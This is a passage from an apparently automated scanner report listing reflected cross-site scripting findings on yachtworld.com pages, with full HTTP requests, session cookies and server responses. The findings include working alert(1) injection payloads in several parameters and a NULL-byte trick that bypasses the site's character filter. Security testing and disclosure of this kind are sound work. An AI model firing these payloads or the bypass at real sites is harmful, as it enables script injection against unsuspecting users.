VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:33:49 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 23 Sep 2010 17:00:28 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<meta name="keywords" content=", 32' 32 Regulator WITH TRAILER **REDUCED**, Photo 11f88f"><script>alert(1)</script>d37390a732d, boat photos, yacht photos, photo gallery, view photos, boat pictures, yacht pictures"/>
...[SNIP]...

3.412. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_revised_date parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/displayPhoto.jsp

Issue detail

The value of the photo_revised_date request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4497e'%3balert(1)//49ec788f734 was submitted in the photo_revised_date parameter. This input was echoed as 4497e';alert(1)//49ec788f734 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=12852612280004497e'%3balert(1)//49ec788f734&photo_name=Photo+1&photo=1&url=&back=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:33:21 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "12852612280004497e';alert(1)//49ec788f734"<br>
...[SNIP]...

3.413. http://www.yachtworld.com/core/listing/photoGallery.jsp [boat_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photoGallery.jsp

Issue detail

The value of the boat_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %006b4b9'%3balert(1)//063528a8d25 was submitted in the boat_id parameter. This input was echoed as 6b4b9';alert(1)//063528a8d25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2266476&boat_id=2266476%006b4b9'%3balert(1)//063528a8d25&back=/core/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&boat_id=2266476 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 22:39:26 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "2266476.6b4b9';alert(1)//063528a8d25"<br>
...[SNIP]...

3.414. http://www.yachtworld.com/core/listing/photoGallery.jsp [boat_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photoGallery.jsp

Issue detail

The value of the boat_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3636f'%3balert(1)//da24b305247 was submitted in the boat_id parameter. This input was echoed as 3636f';alert(1)//da24b305247 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2266476&boat_id=22664763636f'%3balert(1)//da24b305247&back=/core/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&boat_id=2266476 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:34:29 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "22664763636f';alert(1)//da24b305247"<br>
...[SNIP]...

3.415. http://www.yachtworld.com/core/listing/photoGallery.jsp [currency parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photoGallery.jsp

Issue detail

The value of the currency request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b985f><script>alert(1)</script>57738a0195 was submitted in the currency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/photoGallery.jsp?slim=quick&currency=USDb985f><script>alert(1)</script>57738a0195&units=Feet&seo=0&checked_boats=2266476&boat_id=2266476&back=/core/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&boat_id=2266476 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:20 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 21:44:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>
...[SNIP]...
<a href=/core/listing/boatDetails.jsp?boat_id=2266476&checked_boats=2266476&ybw=&units=Feet&currency=USDb985f><script>alert(1)</script>57738a0195&access=Public&listing_id=53549&url=>
...[SNIP]...

3.416. http://www.yachtworld.com/core/listing/photoGallery.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photoGallery.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82cf6"><script>alert(1)</script>38b55a9b8a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/photoGallery.jsp?82cf6"><script>alert(1)</script>38b55a9b8a4=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
